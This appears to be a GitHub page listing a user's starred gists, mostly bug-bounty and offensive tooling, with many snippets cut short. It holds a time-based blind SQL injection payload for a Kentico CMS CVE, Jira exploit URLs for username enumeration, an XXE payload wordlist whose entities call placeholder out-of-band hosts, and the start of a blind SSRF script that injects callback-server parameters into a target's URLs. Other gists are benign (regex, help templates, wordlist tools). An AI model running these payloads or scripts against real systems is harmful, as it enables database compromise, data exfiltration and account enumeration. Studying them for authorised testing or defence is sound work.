Skip to content

Instantly share code, notes, and snippets.

View vavkamil's full-sized avatar
✌️
Hack The Planet !

Kamil Vavra vavkamil

✌️
Hack The Planet !
492 followers · 48 following
View GitHub Profile
@nullenc0de
nullenc0de / apk_params.txt
Last active March 23, 2022 20:49
MD
TermUrl
a
adjust_campaign
alternatives
amount
app
app_id
appname
avoid
@defparam
defparam / json_fuzz_poc.py
Created March 10, 2021 15:11
Turbo Intruder JSON Fuzzing Example using JSONAccessor
# JSON Fuzz Proof of Concept using JSONAccessor
# Author: Evan Custodio (@defparam)
#
# MIT License
# Copyright 2021 Evan Custodio
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
@stasinopoulos
stasinopoulos / CVE-2021-27581.txt
Created March 3, 2021 08:21
CVE-2021-27581
It was identified that the blog module in Kentico CMS 5.5 R2 (build 5.5.3996) is vulnerable to SQL injection attacks via “tagname” parameter, since user-controllable data is incorporated into database SQL queries in an unsafe manner.
This vulnerability can be leveraged by a potential attacker in order to interact with the back-end database and access/modify/delete stored data, interfere with application logic, escalate his privileges within the database and/or potentially take control of the database server.
The vulnerability was exploited using the sqlmap tool:
* Sample url: https://target.com/blog?tagname=test&groupid=1
* Vulnerable parameter: tagname
* Type: time-based blind sql injection
* Sample payload: tagname=test'+(SELECT CHAR(118)+CHAR(103)+CHAR(85)+CHAR(89) WHERE 1718=1718 AND 6176=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7))+'&groupid=1
@0x240x23elu
0x240x23elu / Jira bug-exploit
Last active March 12, 2024 09:45
Jira Bug CVE-2019-8449,CVE-2019-8451,CVE-2019-8451,cve-2018-20824,cve-2020-14179,cve-2020-14181,CVE-2018-5230
cve-2019-8449
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
https://jira.atlassian.com/browse/JRASERVER-69796
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
=====================================================================================================================================
@w9w
w9w / tld_detection.py
Created October 29, 2020 19:57
Matching any website's TLD
import re
tlds_1st_lvl = [
"aaa",
"aarp",
"abarth",
"abb",
"abbott",
"abbvie",
"abc",
@honoki
honoki / xxe-payloads.txt
Last active November 11, 2024 17:01
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@kovetskiy
kovetskiy / samizdat-shell-help.bash
Created July 7, 2020 19:01
#!/bin/bash
###
### my-script — does one thing well
###
### Usage:
### my-script <input> <output>
###
### Options:
### <input> Input file to read.
### <output> Output file to write. Use '-' for stdout.
@olliencc
olliencc / WindowsExtensionMapCSVPlus.bat
Created June 29, 2020 20:28
Enumerate via various methods what opens what on Windows 10 using only batch/cmd
@echo off
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
REM °² Enumerates all files extensions ²°
REM °² and what opens them on Windows 10 in batch/cmd ²°
REM °² twitter: @ollieatnccgroup ²°
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
REM ------------------------------------------------------
REM
@gwen001
gwen001 / wordgrab.sh
Last active March 11, 2022 03:01
create a wordlist from the target itself
#using cewl
wordgrab() {
url=$1
cewl.rb -u "Mozilla/5.0 (X11; Linux; rv:74.0) Gecko/20100101 Firefox/74.0" -d 0 -m 3 https://www.$1 | tr '[:upper:]' '[:lower:]' |sort -fu | grep -v "robin wood"
}
# added min length 3
wordgrab() {
url=$1
tmpfile="$(date "+%s")"
@hussein98d
hussein98d / ssrf.sh
Created May 7, 2020 02:09
This script takes a domain name and a callback server, parses links , appends SSRF parameters and fire the requests.
echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d"
echo "Usage: bash script.sh domain.com http://server-callbak"
echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls"
if [ -z "$1" ]; then
echo >&2 "ERROR: Domain not set"
exit 2
fi
if [ -z "$2" ]; then
echo >&2 "ERROR: Sever link not set"
exit 2